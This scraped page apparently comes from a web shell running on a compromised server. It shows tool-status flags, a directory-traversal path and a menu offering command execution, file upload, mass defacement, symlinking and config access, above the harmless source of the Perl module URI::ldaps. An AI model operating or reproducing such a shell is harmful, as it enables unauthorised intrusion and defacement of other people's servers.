OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /media/../../usr/share/debianutils/../metainfo/../automake-1.16/../cdbs/../perl5/URI/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
package URI::ldaps; use strict; use warnings; our $VERSION = '1.76'; use parent 'URI::ldap'; sub default_port { 636 } sub secure { 1 } 1;